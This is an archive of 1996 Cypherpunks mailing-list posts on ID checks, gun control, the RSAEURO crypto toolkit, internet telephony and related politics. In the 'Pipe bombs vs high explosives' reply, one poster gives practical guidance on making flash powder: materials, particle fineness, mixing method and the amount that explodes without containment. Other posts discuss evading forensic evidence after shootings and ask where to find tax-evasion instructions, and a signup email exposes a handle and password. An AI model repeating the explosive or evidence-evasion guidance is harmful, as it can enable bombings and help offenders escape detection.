against such interference or attacks. 

Article 19 

1. Everyone shall have the right to hold opinions without
interference.
2. Everyone shall have the right to freedom of expression;
this right shall include freedom to seek, receive and impart
information and ideas of all kinds, regardless of frontiers,
either orally, in writing or in print, in the form of art, or
through any other media of his choice.
3. The exercise of the rights provided for in paragraph 2
of this article carries with it special duties and
responsibilities. It may therefore be subject to certain
restrictions, but these shall only be such as are provided by law
and are necessary:
(a) For respect of the rights or reputations of others;
(b) For the protection of national security or of public
order (ordre public), or of public health or morals. 
________

Key, in Article 17, is the term "unlawful." With this escape
clause, the US gov has no problems, long as they make appropriate laws.

Article 19 is more interesting, because restrictions must be
shown to be necessary...

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 5 Aug 1996 08:52:41 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <199608042250.PAA13719@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 8/1/96 -0700, tcmay@got.net (Timothy C. May) wrote:

>Question (a la "Wired"): "When will the United States introduce an internal
>passport?"
>May: "2005, but they won't call it that."

Stewart: "Last week, but they didn't call it that."

According to Alaska Airlines, the FAA's policy as of last week
has switched to a mandatory policy that if you don't produce
government-issued photo-id, you can't get on the plane;
the previous policy had been more flexible.  

The folks stamped my ticket "Documents Verified" - looks
suspiciously similar to "Papers In Order".

       (Which they actually weren't, on my return trip;
        I handed her my work ID in the same plastic carrier
        as my train pass, and handed her the credit card
        I'd bought the tickets with explaining that I wasn't
        on government business and asking when had
        the policy changed and commenting.  And the nice
        Rent-A-Xray-Technician who asked if I minded if
        he searched my computer bag was totally confused
        when I said "Yes, of course I mind.")

You can still travel in a car if someone else is driving,
and you can still get on a train without identification,
but without papers you can't fly or drive, and you can't
ride a horse on the freeway except in the back of a horse trailer.
Driver's licenses were the beginning of a long downhill trend.

I wonder if they'll still accept an American passport; the country
has obviously been taken over by Pod People while we weren't looking....
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 5 Aug 1996 01:56:37 +0800
To: cypherpunks@toad.com
Subject: SAC_ard
Message-ID: <199608041611.QAA03240@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   August ScaAm has longish article on smart-cards by Carol 
   Fancher, a Motorola engineer and developer of the smart- 
   card market. 
 
   ----- 
 
   http://jya.com/sacard.txt  (26 kb) 
 
   Lynx: http://pwp.usa.pipeline.com/~jya/sacard.txt 
 
   Via www.anonymizer.com 
 
   SAC_ard 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@widomaker.com>
Date: Mon, 5 Aug 1996 06:36:53 +0800
To: richard.perez@homepower.org
Subject: New Agers feeding at the porkbarrel trough
Message-ID: <Pine.UW2.3.93.960804161931.11658A-100000@wilma>
MIME-Version: 1.0
Content-Type: text/plain


Looking at page 98 of the August-September _Home Power_ magazine, I see the
publisher, Richard Perez, saying about vendors of non-solar-generated
electricity: "None of this money is billed via your electric meter, but
instead concealed in taxes or paid out everywhere from supermarkets to
hospitals." 

On page 76 of the same edition, in an article titled "The New Utility", we see
the following statement: "If all goes well in November, voters in Davis,
California will vote on implementing the first US rate based incentive (RBI)
program. As discussed in previous issues of _Home Power_, RBI programs are are
locally adopted programs in which communities assess utility bills a 1%
surcharge. The surcharge is used to purchase PV [viz., photovoltaic
solar-generated] power from participating homeowners at a premium rate. The
incentive plus the benefits of net metering [a plan in which electric
utilities are required to pay home-based electricity vendors, the full cost of
a kilowatt-hour of power, notwithstanding that the homeowner didn't pay for
the distribution losses, plant costs of the transmission grid,
untimed-to-load-demand supply, etc] should allow recovery of 90% of system
investment in 10 years."

Now, call me politically incorrect, but I say that utility bills don't get
assessed surcharges - *people* get assessed *taxes*.  I say that if it's
good for the non-solar vendors to be denounced for wanting to offload some
of their costs onto taxpayers, then the sauce is good for the solarpower
gander, too. 

I say that Richard Perez makes his living by encouraging the distribution of
solarpower hardware and services. I say that Richard Perez has a circle of
friends and business associates who are in that industry.

I say that Richard Perez has a conflict of interest. I say that Richard Perez
is a hypocrite.

I will renew my subscription to the magazine.... the non-political
articles are high quality and unmatched elsewhere. I will continue to
purchase selected items from _Home Power_'s advertisers - they fill my
needs.

I will agitate strongly against the "establishment" of solarpower (and
its lesser analogues, such as microhydro, windturbine, biomass) in the
pantheon of pork barrel empires.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Mon, 5 Aug 1996 10:46:37 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Internal Passports
Message-ID: <199608050034.RAA15919@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:

>I wonder if they'll still accept an American passport; the country
>has obviously been taken over by Pod People while we weren't looking....

I don't know if this was an isolated incident, but I recently attempted to
pick up a package at the Post Office using my passport as I.D.  NO, I was
told, this is not acceptable identification, and as a union worker, you
can't tell me what to do.  Appeals to chicken-hearted management were
brushed off; I finally identified the highest ranking union official (shop
steward?), who reluctantly ordered the recalcitrant worker to fetch my parcel.

Your guess is as good as mine...

Dave Rose





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Mon, 5 Aug 1996 08:05:56 +0800
To: Charley Sparks <sparks@bah.com>
Subject: Re: WARNING: SecureDrive & PartitionMagic
Message-ID: <2.2.32.19960804220146.0068d1b8@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 15:47 08/04/96 -0400, Charley Sparks wrote:
>
>
>where can I get a copy of SD and does it work with NT ??
>
Check out: http://www.serve.com/ruccia/securedr.html for the SD.  As 
for working on NT... I haven't the foggiest.  I've got a kludgey way 
of using it under win95, but it mostly works.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgUdrsr4ljoOgY7BAQGTpQP+IZXlrMJh3snU27ydLDcdzCOeDC813GYW
ujHcDpHiItY7Uq4hgBW6qoHIhmrb8DRHgVJDWyfa/OAmwJzs6sAOEzQCP1ktPM7b
LLn1oPphtoPCXN1RXB+s38jHZmzzY32sLidmAqgpMDRboUwDvKfczHs9Tik1PzgQ
X3k3S43k0pc=
=+lgv
-----END PGP SIGNATURE-----
 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      | 
 |          and on a plethora of key servers around the world.          |
 |   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Mon, 5 Aug 1996 11:40:22 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608050134.SAA05951@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil  H-B writes:

>Oh dear oh dear....

(Mucho B.S. elided)

Dear Doc:

Trollmeister supreme Sternlight has left the building.  Hint...hint...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer Mansfield-Jones <strix@rust.net>
Date: Mon, 5 Aug 1996 18:25:30 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS -- lifespans
In-Reply-To: <199608031110.GAA12116@einstein>
Message-ID: <Pine.LNX.3.91.960804180050.3830E-100000@neophron.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 3 Aug 1996, Jim Choate wrote:

> > Date: Fri, 2 Aug 1996 20:12:04 -0700
> > From: tcmay@got.net (Timothy C. May)
> > Subject: Re: SOUP KITCHENS (fwd)
> > 
> > Hardly a proved correlation. A lot of other factors come into play. But
> > never mind. No point arguing.
> 
> But it is. I suggest you take a look at any social health text and look at
> the comparisons between diets of our ancestors, ourselves, and various
> 

In case Alan's post didn't make it clear, _average_ lifespan values are
averages from birth.  Maximum lifespans haven't changed.  However, between
the effects of vaccination and municipal sewage treatment, any infant born
in a developed country has a good chance of living a long time.  A society
with very high birth rates and high infant mortality will have a low
average lifespan even if every child who makes it to the age of ten lives
to be a hundred. 

regards,
`=-`=-`=-`=-                                          -='-='-='-='
 Jennifer Mansfield-Jones   http://www.rust.net/~strix/strix.html
 strix@rust.net                            PGP key ------^
          Never try to outstubborn a cat.  (R.A.H.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgUoOUxVmNNM34OxAQG59AQAropfEClWviL0TZaLqlos5p/gP5cnQGYL
uMVAgtBb5smfD3GF5xs4LBtvW5987H4oFI5AOXCUcOuKePWXhtXwMbA5g9JfbKpa
v8sm9v1uG9ci9TwiArD5ePu1xBE4974IBo+23dEfq0LD/QhioO4J2QFMaKkiqoBe
tu9z5eccjqY=
=Ya3s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 5 Aug 1996 11:50:33 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <v02120d27ae2b05587a10@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:48 8/4/96, Bill Stewart wrote:

>I wonder if they'll still accept an American passport; the country
>has obviously been taken over by Pod People while we weren't looking....

A US passport is not considered valid ID by the State of Oregon. If
somebody here doesn't belive this, send someone who looks like he might be
under 21 into any liquor store in Oregon with just an US passport.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 5 Aug 1996 12:10:11 +0800
To: Hallam-Baker <cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <v02120d28ae2b079d02b4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:20 8/4/96, Hallam-Baker wrote:

>If people go arround claiming that ownership of guns is necessary
>so that people can commit acts of treason against the US govt
>then it is inevitable that there will be pressure for greater
>regulation. The NRA has been playing a bad hand stupidly. By
>raising the militia argument they have played into the hands
>of abolitionists.

Appeasement never works. See the following two quotes.

"1935 will go down in history. For the first time, a civilized nation has
full gun registration. Our streets will be safer, our police more efficient,
and the world will follow our lead into the future." - Adolf Hitler

* > What country can preserve its liberties if its rulers are not  <*
* > warned from time to time that their people preserve the spirit <*
* > of resistance?  Let them take arms!" - Thomas Jefferson, 1787  <*

NRA Life Member and proud of it,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 5 Aug 1996 12:23:14 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <2.2.32.19960805022246.00d7c568@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:01 PM 8/4/96 -0700, Lucky Green wrote:
>At 15:48 8/4/96, Bill Stewart wrote:
>
>>I wonder if they'll still accept an American passport; the country
>>has obviously been taken over by Pod People while we weren't looking....
>
>A US passport is not considered valid ID by the State of Oregon. If
>somebody here doesn't belive this, send someone who looks like he might be
>under 21 into any liquor store in Oregon with just an US passport.

This is because Oregon has been taken over by The Pod People.  (Or at least,
the Oregon Liqueur Control Commission has.) 

Getting such foolishness reversed is difficult when you have as many control
freaks in the State Legislature (and elsewhere).
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RSAEURO General <rsaeuro@sourcery.demon.co.uk>
Date: Mon, 5 Aug 1996 05:31:16 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE:- RSAEURO Version 1.03
Message-ID: <3204fbd0.27628667@post.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCE:- RSAEURO Version 1.03
===============================

What is RSAEURO?
----------------

RSAEURO is a cryptographic toolkit providing various functions
for the use of digital signatures, data encryption and supporting
areas (PEM encoding, random number generation etc).  To aid
compatibility with existing software, RSAEURO is call-compatible
with RSADSI's "RSAREF(tm)" toolkit. RSAEURO allows non-US
residents to make use of much of the cryptographic software
previously only (legally) available in the US.

RSAEURO contains support for the following:

*    RSA encryption, decryption and key generation.  Compatible
     with 'RSA Laboratories' Public-Key Cryptography Standard
     (PKCS) #1.

*    Generation and verification of message digests using MD2,
     MD4, MD5 and SHS (SHS currently not implemented in
     higher-level functions to maintain compatibility with
     PKCS).

*    DES encryption and decryption using CBC (1, 2 or 3 keys
     using Encrypt-Decrypt-Encrypt) and DESX(tm), RSADSI's
     secure DES enhancement.

*    Diffie-Hellman key agreement as defined in PKCS #3.

*    PEM support support for RFC 1421 encoded ASCII data with
     all main functions.

*    Key routines implemented in assembler for speed (80386 and
     680x0 currently supported).

International Use
-----------------

IMPORTANT NOTICE:  Please do not distribute or use this software
in the US it is 'illegal' to use this toolkit in the US, as RSADSI and
Cylink hold patents relating to public-key cryptography.  If you are a
US resident, please use the RSAREF toolkit instead.


On The Web
----------

RSAEURO can now be found at

http://www.sourcery.demon.co.uk/rsaann.html

Ftp Sites
---------

RSAEURO can be found at

ftp://ftp.ox.ac.uk/pub/crypto/misc

Author Details
--------------

With comments and suggestions, please address them to Stephen
Kapp, at 'rsaeuro@sourcery.demon.co.uk'

----------------------------------------------------------------------------
RSAEURO:      rsaeuro@sourcery.demon.co.uk
RSAEURO Bugs: rsaeuro-bugs@sourcery.demon.co.uk
Tel:          +44 (0) 468 286034
Http:         http://www.sourcery.demon.co.uk/rsaann.html

RSAEURO - Copyright (c) J.S.A.Kapp 1994-1996.
----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Mon, 5 Aug 1996 10:13:18 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <4u3255$si2@life.ai.mit.edu>
Message-ID: <32053E44.2781@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Oh dear oh dear....

First off people on cypherpunks seem to have the idea that the type
of people who go blasting peoples heads off have brains. Without
wanting to inflate people's egos too much the average reader of
cypherpunks is an awful lot smarter than your average criminal. 

Fancy plans to disolve gun barrels etc are way too complex for 
your average criminal and in any case it is substantially easier
to drop a gun in a lake or the sea and less likely to result in
incrimination than to try disolving it, run 200 rounds through
it or whatever.


Vacuming up powder left over from a rifle range would not help
very much. One of the problems of building a bomb is to make 
sure that all the explosive goes off. A gas chromatograph is 
able to differentiate spent and unspent explosive. It would be 
easier to go off and buy the stuff from multiple sources or
to make ones own explosive from nitrates with oxidants.

I would expect that anyone vacuming up the residue from a gun
club is likely to have difficulty explaining what he is doing.
After all one does not usually go off to play Rambo, then stick
an apron on and start doing the housework.


I personally think that tagants is an insuffieicent approach to
the problem. Given the number of gun related homicides in the
US it is not unreasonable to require each individual cartridge
to be stamped with a serial number and for gun dealers to be 
required to record each individual purchase. That at least 
was my advice to the UK govt after Dunblane. 

If people go arround claiming that ownership of guns is necessary
so that people can commit acts of treason against the US govt
then it is inevitable that there will be pressure for greater
regulation. The NRA has been playing a bad hand stupidly. By
raising the militia argument they have played into the hands
of abolitionists. It would be entirely foolish for the crypto
lobby to allow themselves to be tied to the NRA. The NRA has
no choice but to support civil liberties, there is no reason
why the wider civil liberties movement needs to support the
NRA.


More significant for crypto  policy is the recent revelations 
about US spying on the European Union by spoofing CISCO routers
via SNMP. That act should be exploited to drive a wedge between
US attempts to bar use of cryptographic security systems and
the members of the EU.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 5 Aug 1996 11:06:47 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Pipe bombs vs high explosives.
In-Reply-To: <199608040337.UAA17682@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.94.960804210041.9632F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 3 Aug 1996, James A. Donald wrote:

> Does anyone have any experimental information comparing an 
> untamped high explosive with a pipe bomb?

> Homemade low explosives tend to be even more feeble 
> than manufactured low explosives, because it is inadvisable
> for amateurs to recorn their powder, with the result that
> home made powders burn slow, whereas homemade high
> explosives are just as effective as manufactured high 
> explosives.
> 
> My theoretical expectation is that pipe bombs would be 
> very ineffectual when compared to high explosives, 
> especially using home made powders.

Flash powders are quite easy to make and deflagrate quickly enough to
cause quite a nice bang without any containment what so ever when set off
in amounts over about two tablespoons worth.

Start off with fine enough mesh Al powder and grind your oxidizer down
fine enough and all you need for proper mixing is a (static treated)
zip-lock bag.

Not that I would ever suggest that anyone try to manufacture such
mixtures, but they are plenty potent enough to match and exceed most
manufactured deflagrating powders.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 5 Aug 1996 14:15:07 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: A Libertine Question
Message-ID: <199608050420.VAA16738@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:18 PM 7/31/96 -0400, DCF wrote:
>Since there are no "public places" in a free society, 

If it _were_ a free society, there would be places that
nobody had conquered yet, common and usable by anyone
(as opposed to today's "public" spaces that had been conquered
by a government which claims the right to exclude others,
and places owned by individuals or groups which the government
has said are none-the-less public.)

There would probably also be places that were owned by
people who had somehow acquired the right to kick other people out;
you can argue about whether a free society should treat land
this way.  (Most land ownership in the US derives from
land grants given by kings who were put in place by
watery tarts handing out swords or equally authoritative processes,
or from land that the Yankees stole from the Mexicans
and then re-stole from the Indians and granted to the railroads.)

In a human-created environment like cyberspace the existence
of ownable spaces is obviously true, unlike found spaces like land.  
There are also found spaces in cyberspace where there's no particular
rightness to assigning ownership, and places that even if
you decide ownership through first use is a good thing,
people can decide to leave unowned or shared.
IP address space and domain name space are good examples -
property ownership is a useful analogy, preventing conflicts
by multiple people who want the name foo.com, but once you've
suggested naming things *.com, it's fair game.
On the other hand, since the Internet is a cooperative shared fiction,
if you want people to be able to find and connect to you,
getting the popular nameservers and routers to point the name
joesgarage.microsoft.com and IP address 127.0.0.2 in your direction
may not be highly productive.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Ray" <liberty@gate.net>
Date: Mon, 5 Aug 1996 12:01:30 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill...[Noise]
Message-ID: <199608050151.VAA72932@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Phill Hallam-Baker <hallam@ai.mit.edu> wrote:

>Oh dear oh dear....
...

>I personally think that tagants is an insuffieicent approach to
>the problem. Given the number of gun related homicides in the
>US it is not unreasonable to require each individual cartridge
>to be stamped with a serial number and for gun dealers to be 
>required to record each individual purchase. That at least 
>was my advice to the UK govt after Dunblane. 

So _THAT'S_ how they could have prevented the atrocity.  ;>

Weakening caused by the stress of stamping, the immensity of the
number of cartidges fired every day in the U.S., and the fact that
revolvers *exist* aside, we have these strange people called
"reloaders" in this country, Phill, and right now they have LOTS of
unstamped brass on hand. Criminals who wanted it would have an
unlimited supply into the foreseeable future. I agree with you that
criminals are, on the whole, dumber than cypherpunks, but it is easy
for them to pick up ideas like shooting a few hundred rounds or filing
a barrel etc. whether or not they are as likely as we are to have them
first. They already use all-fabric bleach to get any blood/DNA out of
clothing used in crimes, and even if they ARE stupid, they sit around
jail cells an awful lot talking about how to get away with their
crimes next time. JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"Big business never pays a nickel in taxes, according to Ralph
Nader, who represents a big consumer organization that never
pays a nickel in taxes." -- Dave Barry 

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMgVRim1lp8bpvW01AQFwxAP7B4AugPSgmbnhFE3J7d8un1CMzYTznJkq
4Pf8zjH9iOo3pn+LoY7QgOFjUZo5tcuGRfyiEWJozfoeykhQ7Ds3tpiAUtfx2smN
1O9LGHuzv6WDOKuqK4bKAS20S0W2lWRgcDDBc8PEcXdSgekCDCgBFKRPr+IKY/jP
j2TIIVt0aLE=
=dOud
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Mon, 5 Aug 1996 14:20:46 +0800
To: Fallen Angel <fallenangel@multipro.com>
Subject: Re: problem
In-Reply-To: <3203D296.2E30@multipro.com>
Message-ID: <Pine.OSF.3.91.960804231307.8066A-100000@alpha.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


First go read the original documents that were sent to you. A novel idea.


On Sat, 3 Aug 1996, Fallen Angel wrote:

> I unsubscribed from your mailing list so why am I still receiving 
> email from it. I No longer wish to receive any more mail, so please stop 
> it.
> 
> Fallen Angel
> fallenangel@multipro.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stephenson <cts@deltanet.com>
Date: Mon, 5 Aug 1996 16:46:04 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: 119_816
In-Reply-To: <2.2.32.19960718235050.006c0f38@gonzo.wolfenet.com>
Message-ID: <320595D0.7D52@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn wrote:
> 
> At 11:29 AM 7/17/96 GMT, you wrote:
> >   6-17-96. NYP:
> >
> >   "11 Officers Are Accused of Failure to pay Taxes. Claims of
> >   Sovereignty and 98 Dependents."
> >
> >      At least 11 New York City police officers have been
> >      accused of failing to pay any Federal taxes for several
> >      years by declaring they each had 98 dependents and by
> >      insisting that the Government had no right to tax them.
> >      The officers relied on a package of instructions that
> >      described how to avoid paying taxes by declaring that
> >      they were sovereign citizens who did not have to pay
> >      taxes.
> 
> Anyone know which "package of instructions" they were using,
> and where they can be obtained online?
> //cerridwyn//

I've heard of this before. Check altavista for soveriegn(sp?) citizens
of the united states. A lot of complicated rambling about birth 
certificates, duress and the federal government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Mon, 5 Aug 1996 03:58:44 +0800
To: cypherpunks@toad.com
Subject: Internet telephony (was Freeh slimes again)
Message-ID: <1.5.4.32.19960804173946.003173d8@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 13:11 02/08/96 -0700, Lucky Green wrote:
>The sound quality really isn't there, unless you have a fast machine or a
>fat pipe. In addition, the vast majority of Intel based computers lack the
>crucial (for user acceptance) full-duplex soundcard. Add to that the
>physical impossibility of getting decent real time services over a
>non-isochronous network, such as the Internet, I'net phones just don't
>provide suffcient speech quality for business/serious personal use even
>without the added overhead of crypto.

What I'd like to see -- for which technology is all in place, and
none of the shortcomings you mention apply -- is voice mail that
functions seamlessly between people who only have a phone, and
those with Internet connections on computers with a sound card.
Many companies practically use voice mail as an alternative to
long phone conversations. This might also help the Internet
spread, because with a connection you would be able to save  on
long-distance charges -- and strong crypto could be used.

I'm sure the software for this exists too -- the ISPs only have
to run it on their servers. It would be nice, though, if the ISPs
had a facility that when there is a voice message for you, it
either phones or pages you...
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WebChat Broadcasting System <problem@webchat.wbs.net>
Date: Mon, 5 Aug 1996 17:14:49 +0800
To: cypherpunks@toad.com
Subject: Validation Code for WBS Access
Message-ID: <9608050701.AA02391@webchat.wbs.net>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for joining the WebChat Broadcast System!  We eagerly await 
seeing you online.  

Your handle is:   e3f0f5eeeb
Your password is: toad

Your validation# is: 90582293  (you only need to use this once)

To get full access to the system, go to 
http://wbs.net and enter any room.  When prompted, enter your handle,
password. and validation#.

Then you're done!  You'll have full privileges on WBS.

By validating you acknowledge having read the WBS system rules
(at http://wbs.net/wbs/rules.html) and promise to abide by them.  
Thank you.


If you have any difficulties please write us at problem@wbs.net.  Thanks, 
and enjoy!

Sincerely,

The staff at WebChat Broadcasting System




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 5 Aug 1996 14:39:26 +0800
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <32053E44.2781@ai.mit.edu>
Message-ID: <Pine.SV4.3.91.960805002648.13067C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Aug 1996, Hallam-Baker wrote:

> in any case it is substantially easier
> to drop a gun in a lake or the sea and less likely to result in
> incrimination than to try disolving it, run 200 rounds through
> it or whatever.
 
   Police divers pull murder weapons out of the water all the time. It's
very, very common.

Phil, is there ANY freedom that you would fight for?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 5 Aug 1996 15:28:04 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <v02120d27ae2b05587a10@[192.0.2.1]>
Message-ID: <NBa7RD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) writes:

> At 15:48 8/4/96, Bill Stewart wrote:
>
> >I wonder if they'll still accept an American passport; the country
> >has obviously been taken over by Pod People while we weren't looking....
>
> A US passport is not considered valid ID by the State of Oregon. If
> somebody here doesn't belive this, send someone who looks like he might be
> under 21 into any liquor store in Oregon with just an US passport.

This reminds me how many years ago (I think this was under Reagan, or maybe
even Carter) I went to U.S.V.I without any papers at all, not realizing that
it's "abroad". When the time came for me to get back, I was shocked to see
some security people checking the papers of the people getting on the plane
to N.Y. I explained the situation and they let me in with no papers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zero Cool <rvincent@cnmnet.com>
Date: Tue, 6 Aug 1996 05:58:31 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK YOU, SHITOPUNKS
In-Reply-To: <199608051211.GAA26432@zifi.genetics.utah.edu>
Message-ID: <3205B283.183B@cnmnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> FUCK YOU, SHITOPUNKS
> DAVID STERNLIGHTSuch language,
???????????????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zero Cool <rvincent@cnmnet.com>
Date: Tue, 6 Aug 1996 06:05:35 +0800
To: cypherpunks@toad.com
Subject: viruss'
Message-ID: <3205B2F7.7E74@cnmnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know where thre is  good virus page????
I know that there is one out there, but dont have the add.
Zero Cool




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@csbh.mhv.net>
Date: Mon, 5 Aug 1996 16:19:32 +0800
To: cypherpunks@toad.com
Subject: Re: More to be paranoid about...
Message-ID: <1.5.4.16.19960805061137.2aef92e0@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 PM 8/3/96 -0700, Alan Olsen wrote:
>Take a look at:
>
